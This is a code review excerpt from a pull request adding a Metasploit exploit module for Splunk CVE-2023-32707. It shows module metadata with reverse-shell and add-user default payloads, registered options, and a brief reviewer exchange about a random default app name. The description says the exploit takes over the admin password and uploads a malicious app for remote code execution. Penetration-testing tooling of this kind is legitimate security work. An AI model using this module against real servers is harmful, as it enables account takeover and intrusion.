modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb

```diff
@@ -0,0 +1,416 @@
+        info,
+        'Name' => 'Splunk "edit_user" Capability Privilege Escalation',
+        'Description' => %q{
+          A low-privileged user who holds a role that has the "edit_user" capability assigned to it
+          can escalate their privileges to that of the admin user by providing a specially crafted web request.
+          This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf
+          configuration file, which prevents this scenario from happening.
+
+          This exploit abuse this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.
+        },
+        'Author' => [
+          'Mr Hack (try_to_hack) Santiago Lopez', # discovery
+          'Heyder Andrade', # metasploit module
+          'Redway Security <redwaysecurity.com>' # Writeup and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2023-32707' ],
+          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory
+          [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup
+          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC
+        ],
+        'Payload' => {
+          'Space' => 1024,
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux unix win osx],
+        'Targets' => [
+          [
+            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix],
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            }
+          ],
+          [
+            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK # app is uploaded
+          ]
+        },
+        'DisclosureDate' => '2023-06-01'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),
+        OptString.new('PASSWORD', [true, 'The password for the specified username']),
+        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
+        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)']),
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)'])
```

Comment:
Is there any issues with inlining the default value here?


```suggestion
        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.gsub...etc...])
```

I assume we want it to be random on each module run to ensure there's no issues, but just wanted to confirm :+1:

Reply:
Done